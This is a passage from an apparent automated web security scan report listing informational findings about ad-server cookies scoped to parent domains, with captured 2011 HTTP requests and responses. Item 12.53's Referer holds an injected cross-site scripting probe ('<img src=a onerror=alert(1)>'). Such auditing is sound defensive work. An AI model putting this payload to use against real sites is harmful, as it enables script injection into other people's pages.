12.41. http://ad.doubleclick.net/adj/N5295.SD128132N5295SN0/B5753751.3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5295.SD128132N5295SN0/B5753751.3

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adj/N5295.SD128132N5295SN0/B5753751.3;sz=728x90;click0=http://a1.interclick.com/icaid/187969/tid/32538ae1-3af4-420f-9506-361ee76e8329/click.ic?;ord=634518590430909710? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/hearst/728x90/ht_1064834_61686642?t=1316294711579&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.seattlepi.com%2F&refer=http%3A%2F%2Fhearst.com%2Fnewspapers%2Fseattlepicom.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 38314
Set-Cookie: id=c07e7413c0000fe||t=1316276763|et=730|cs=002213fd48bb4f54b8fdb0bbf6; path=/; domain=.doubleclick.net; expires=Mon, 16 Sep 2013 16:26:03 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Fri, 16 Sep 2011 16:26:03 GMT
Date: Sat, 17 Sep 2011 16:26:03 GMT
Expires: Sat, 17 Sep 2011 16:26:03 GMT
Cache-Control: private

document.write('');

if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayManagers =
...[SNIP]...
12.42. http://ad.doubleclick.net/adj/hdm.answerology/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/hdm.answerology/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adj/hdm.answerology/;site=answerology;cat=homepage;demo=adult;tile=1;sect=answerology;dcopt=ist;sz=728x90;ord=6608837274834514? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/index.aspx?template=ads.ascx&topic=homepage&tile=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 803
Set-Cookie: id=c43e9413c0000f3||t=1316276874|et=730|cs=002213fd489b619fd73d6ecf5d; path=/; domain=.doubleclick.net; expires=Mon, 16 Sep 2013 16:27:54 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Fri, 16 Sep 2011 16:27:54 GMT
Date: Sat, 17 Sep 2011 16:27:54 GMT
Expires: Sat, 17 Sep 2011 16:27:54 GMT
Cache-Control: private

document.write('<IFRAME SRC=\"http://ad.agkn.com/iframe!t=1089!?ct=US&st=TX&ac=214&zp=75207&bw=4&dma=102&city=13290&che=2499857&clk1=http://ad.doubleclick.net/click%3Bh%3Dv8/3b85/3/0/%2a/p%3B245108818
...[SNIP]...
12.43. http://ad.doubleclick.net/adj/hdm.donatemydress/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/hdm.donatemydress/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adj/hdm.donatemydress/;site=donatemydress;dcopt=ist;sz=728x90;tile=1;pos=1;ord=2692568986676633.5? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.donatemydress.org/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 277
Set-Cookie: id=c1bf4413c0000c4||t=1316277207|et=730|cs=002213fd48acbab5aa131f4e54; path=/; domain=.doubleclick.net; expires=Mon, 16 Sep 2013 16:33:27 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Fri, 16 Sep 2011 16:33:27 GMT
Date: Sat, 17 Sep 2011 16:33:27 GMT
Expires: Sat, 17 Sep 2011 16:33:27 GMT
Cache-Control: private

document.write('');

admeld_publisher = 303;
admeld_site = 'hearst_us';
admeld_size = '728x90';
admeld_placement = 'donatemydress_us';

document.write('\n<script type=\"text/javascript\
...[SNIP]...
12.44. http://ad.doubleclick.net/adj/hdm.misquincemag/other/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/hdm.misquincemag/other/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adj/hdm.misquincemag/other/;sz=728x90,1000x124;tile=1;pos=1;site=misquincemag;sect=index;sub=index;subsub=index;page=homepage;cat=other;subcat=;tool=ros;artid=;kw=;a=;b=;mtfIFPath=/cm/shared/admeld/;game=;ord=8617154576350003? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.misquincemag.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 276
Set-Cookie: id=ccff4413c0000fd||t=1316277234|et=730|cs=002213fd48d263a0fc74d34af8; path=/; domain=.doubleclick.net; expires=Mon, 16 Sep 2013 16:33:54 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Fri, 16 Sep 2011 16:33:54 GMT
Date: Sat, 17 Sep 2011 16:33:54 GMT
Expires: Sat, 17 Sep 2011 16:33:54 GMT
Cache-Control: private

document.write('');

admeld_publisher = 303;
admeld_site = 'hearst_us';
admeld_size = '728x90';
admeld_placement = 'misquincemag_us';

document.write('\n<script type=\"text/javascript\"
...[SNIP]...
12.45. http://ad.doubleclick.net/adj/hdm.quicksimple/answerology/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/hdm.quicksimple/answerology/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adj/hdm.quicksimple/answerology/;site=quicksimple;cat=homepage;demo=adult;tile=1;sect=answerology;dcopt=ist;sz=728x90;ord=1122309262641763? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://answerology.quickandsimple.com/index.aspx?template=ads.ascx&topic=homepage&tile=1
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 627
Set-Cookie: id=cbc66423c000019||t=1316280732|et=730|cs=002213fd4849d550a5f323dd54; path=/; domain=.doubleclick.net; expires=Mon, 16 Sep 2013 17:32:12 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Fri, 16 Sep 2011 17:32:12 GMT
Date: Sat, 17 Sep 2011 17:32:13 GMT
Expires: Sat, 17 Sep 2011 17:32:13 GMT
Cache-Control: private

document.write('<!-- Template ID = 4134 Template Name = A HDM JPG/GIF as Rich Media -->\n<img src=\"http://m.doubleclick.net/dot.gif\" width=\"1\" height=\"1\" border=\"0\">\n<a href=\"http://ad.doubl
...[SNIP]...
12.46. http://ad.doubleclick.net/adj/hdm.quicksimple/other/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/hdm.quicksimple/other/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adj/hdm.quicksimple/other/;sz=728x90,1000x124;tile=1;pos=1;site=quicksimple;sect=index;sub=index;subsub=index;page=homepage;cat=other;subcat=;tool=ros;artid=;kw=;a=;b=;mtfIFPath=/cm/shared/admeld/;game=;ord=2083708371501416? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.quickandsimple.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 940
Set-Cookie: id=cc1f9413c00001a||t=1316277279|et=730|cs=002213fd4864953bd0708bdf93; path=/; domain=.doubleclick.net; expires=Mon, 16 Sep 2013 16:34:39 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Fri, 16 Sep 2011 16:34:39 GMT
Date: Sat, 17 Sep 2011 16:34:39 GMT
Expires: Sat, 17 Sep 2011 16:34:39 GMT
Cache-Control: private

document.write('<IFRAME SRC=\"http://ad.agkn.com/iframe!t=1089!?ct=US&st=TX&ac=214&zp=75207&bw=4&dma=102&city=13290&che=2936648&clk1=http://ad.doubleclick.net/click%3Bh%3Dv8/3b85/3/0/%2a/g%3B245108818
...[SNIP]...
12.47. http://ad.doubleclick.net/adj/hdm.seventeen/other/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/hdm.seventeen/other/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adj/hdm.seventeen/other/;sz=1x2;dcopt=ist;tile=1;pos=1;site=seventeen;sect=index;sub=index;subsub=index;page=homepage;cat=other;subcat=;tool=ros;artid=;kw=;a=;b=;ord=6638360701035708? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.seventeen.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 709
Set-Cookie: id=ce8fb413c00000e||t=1316277295|et=730|cs=002213fd4897ff7da328ea186e; path=/; domain=.doubleclick.net; expires=Mon, 16 Sep 2013 16:34:55 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Fri, 16 Sep 2011 16:34:55 GMT
Date: Sat, 17 Sep 2011 16:34:55 GMT
Expires: Sat, 17 Sep 2011 16:34:55 GMT
Cache-Control: private

document.write('<!-- Template ID = 4134 Template Name = A HDM JPG/GIF as Rich Media -->\n<img src=\"http://m.doubleclick.net/dot.gif\" width=\"1\" height=\"1\" border=\"0\">\n<a href=\"http://ad.doubl
...[SNIP]...
12.48. http://ad.doubleclick.net/adj/hdm.thedailygreen/other/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/hdm.thedailygreen/other/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adj/hdm.thedailygreen/other/;sz=1x2;dcopt=ist;tile=1;pos=1;site=thedailygreen;sect=index;sub=index;subsub=index;page=homepage;cat=other;subcat=;tool=ros;artid=;kw=;a=;b=;ord=260784949641674.75? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.thedailygreen.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 715
Set-Cookie: id=c1ced413c0000df||t=1316276823|et=730|cs=002213fd480ea4aeca9855f41c; path=/; domain=.doubleclick.net; expires=Mon, 16 Sep 2013 16:27:03 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Fri, 16 Sep 2011 16:27:03 GMT
Date: Sat, 17 Sep 2011 16:27:03 GMT
Expires: Sat, 17 Sep 2011 16:27:03 GMT
Cache-Control: private

document.write('<!-- Template ID = 4134 Template Name = A HDM JPG/GIF as Rich Media -->\n<img src=\"http://m.doubleclick.net/dot.gif\" width=\"1\" height=\"1\" border=\"0\">\n<a href=\"http://ad.doubl
...[SNIP]...
12.49. http://ad.doubleclick.net/adj/hfmus.eg.hp/landingpage  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/hfmus.eg.hp/landingpage

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adj/hfmus.eg.hp/landingpage;sz=640x175;loc=1;ord=7698357149492949000? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 286
Set-Cookie: id=c1bf4413c0000c7||t=1316277207|et=730|cs=002213fd48a0510f8cad92fee3; path=/; domain=.doubleclick.net; expires=Mon, 16 Sep 2013 16:33:27 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Fri, 16 Sep 2011 16:33:27 GMT
Date: Sat, 17 Sep 2011 16:33:27 GMT
Expires: Sat, 17 Sep 2011 16:33:27 GMT
Cache-Control: private

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b85/0/0/%2a/h;44306;0-0;0;55334957;38868-640/175;0/0/0;;~okv=;sz=640x175;loc=1;~aopt=2/1/25/1;~sscs=%3f"><img src="http:/
...[SNIP]...
12.50. http://ad.doubleclick.net/adj/locm.hp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/locm.hp

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adj/locm.hp;dcopt=ist;kw=;pos=;tile=;city=dallas_tx_75201;sz=163x27;kw=org;ord=1316294750105? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.local.com/dart/?ag=True&css=sponsored-by&p=locm.hp&sz=163x27&ord=1316294750105&l=Dallas%2c+TX&zip=75201&kw=org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 245
Set-Cookie: id=c1def413c00005f||t=1316276935|et=730|cs=002213fd48840c95f4164782de; path=/; domain=.doubleclick.net; expires=Mon, 16 Sep 2013 16:28:55 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Fri, 16 Sep 2011 16:28:55 GMT
Date: Sat, 17 Sep 2011 16:28:55 GMT
Expires: Sat, 17 Sep 2011 16:28:55 GMT
Cache-Control: private

document.write('<a target="_top" href="http://ad.doubleclick.net/click;h=v8/3b85/0/0/%2a/h;44306;0-0;0;49214119;40236-163/27;0/0/0;;~sscs=%3f"><img src="http://s0.2mdn.net/viewad/817-grey.gif" border=
...[SNIP]...
12.51. http://ad.doubleclick.net/adj/ugo.ugo.ugohome/ugohome  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/ugo.ugo.ugohome/ugohome

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adj/ugo.ugo.ugohome/ugohome;pt=;river=true;sz=86x14;pos=top;tile=1;ord=5174952836? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.ugo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 246
Set-Cookie: id=c6dee413c0000f6||t=1316276912|et=730|cs=002213fd481c2b18d85e3c3cc0; path=/; domain=.doubleclick.net; expires=Mon, 16 Sep 2013 16:28:32 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Fri, 16 Sep 2011 16:28:32 GMT
Date: Sat, 17 Sep 2011 16:28:32 GMT
Expires: Sat, 17 Sep 2011 16:28:32 GMT
Cache-Control: private

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b85/0/0/%2a/h;44306;0-0;0;33074931;35013-86/14;0/0/0;;~sscs=%3f"><img src="http://s0.2mdn.net/viewad/817-grey.gif" border
...[SNIP]...
12.52. http://ad.wsod.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /?view=privacy&action=optout&nocache=0.5213477 HTTP/1.1
Host: ad.wsod.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Cookie: u=4e56cc155a794; i_1=46:1990:1225:0:0:50313:1314578415:B2|33:1411:1209:100:0:50287:1314388230:B2|33:1828:1214:0:0:54419:1314311189:L

Response

HTTP/1.1 302 Found
Server: nginx
Date: Sat, 17 Sep 2011 17:19:12 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: u=OPT_OUT; expires=Thu, 15-Sep-2016 17:18:59 GMT; path=/
Set-Cookie: ub=OPT_OUT; expires=Thu, 15-Sep-2016 17:18:59 GMT; path=/; domain=.wsod.com
Location: nai_status/optout_check.php
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 0

12.53. http://ads.adbrite.com/adserver/vdi/762701  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/762701

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/vdi/762701?d=439524AE9E11374EB2C0C71740C604 HTTP/1.1
Host: ads.adbrite.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.gather.com/426d8%3Cimg%20src%3da%20onerror%3dalert(1)%3E31b7c6065d67ada9d?recentId=1688849889241963&qualityCommentWidth=350&url=http%3A%2F%2Fwww.gather.com%2F&_=
Cookie: Apache="168296556x0.184+1312290886x-1235322650"; ut="1%3AHczdEkAgEEDhd9nrLsRoGm8TyhC1QjGtd%2Fdze%2BabkyGW0GSw%2Bko%2B9Bs0ELwoIvEkpZmIU8EQ990Tj0bg8Ieg17kmfnq1WiqpOhi66TIv6dAuHwEGrXJOh%2FFfwn0%2F"; rb2=EAE; vsd=0@2@4e737a2c@www.drugstore.com

Response

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Sat, 17 Sep 2011 17:05:14 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: ut=; path=/; domain=.adbrite.com; expires=Sat, 17-Sep-2011 17:05:14 GMT
Set-Cookie: rb2=; path=/; domain=.adbrite.com; expires=Sat, 17-Sep-2011 17:05:14 GMT
Set-Cookie: srh=; path=/; domain=.adbrite.com; expires=Sat, 17-Sep-2011 17:05:14 GMT
Set-Cookie: b="deleted%3A%3Adeleted"; path=/; domain=.adbrite.com; expires=Sun, 16-Sep-2012 17:05:14 GMT
Set-Cookie: vsd=0@3@4e74d34a@www.gather.com; path=/; domain=.adbrite.com; expires=Mon, 19-Sep-2011 17:05:14 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;
12.54. http://ads.amgdgt.com/ads/opt-out  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.amgdgt.com
Path:   /ads/opt-out

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ads/opt-out?op=set&src=NAI&j=&nocache=9.150338E-02 HTTP/1.1
Host: ads.amgdgt.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Cookie: ID=AAAAAQAUHqYBDWyeyqBqE.cF1jqOLbPjn1oAAA1YFsfiLUo6rk5pJNfdIYQAAAExm.TKgQ--; UA=AAAAAQAUeT0Tz4iljYcD9iEnCYmYapQqgBYDA3gBY2BgYGZgemDIwLrMloGRv5KB4VQyAwODMAMDo5G1Nv8nBqYv0Qysbr.R5ETAclpByxmYTp1lYO1zZGB0V2VguJcH1AeSM5z95FQjkA0GfimCDAzcDAwsGxjlGYFUDiMDEwPDsk5GGSBv42UwteUGWHD5UrCSdR5gauM5RnGgkuZisFx.GBMDIyOQv_wamA90nJbXAwYgG.g8hsdyAg.BciAAAJeiJYQ-; LO=AAAAAQAUotqj15aS_QGuCXhIm1.jywXl56wBAHVzYTt0eDs2MjM7ZGFsbGFzOzc1MjA3O3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjticm9hZGJhbmQ7NTAuMjMuMTIzLjEwNg--

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Set-Cookie: OO=OptOut; Domain=.amgdgt.com; Expires=Tue, 14-Sep-2021 16:48:14 GMT; Path=/
Set-Cookie: UA=""; Domain=.amgdgt.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ID=""; Domain=.amgdgt.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: LO=""; Domain=.amgdgt.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Location: http://ads.amgdgt.com/ads/opt-out?op=verify_set&src=NAI
Content-Length: 0
Date: Sat, 17 Sep 2011 16:48:14 GMT

12.55. http://adserver.teracent.net/tase/ad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adserver.teracent.net
Path:   /tase/ad

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tase/ad?AdBoxType=15&url=googleoffers.dfa.cities&inv=doubleclick&rnd=1316294720636&esc=0&CustomQuery=zipcode%3D75207%26dma%3D102%26eaid%3D244382735%26epid%3D68093638%26esid%3D791901%26ecid%3D43091605%26ebuy%3D5753751%26 HTTP/1.1
Host: adserver.teracent.net
Proxy-Connection: keep-alive
Referer: http://s0.2mdn.net/3125202/PID_1715626_Parent_SkyBridge_Merchant_Dynamic_728x90_noStore.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
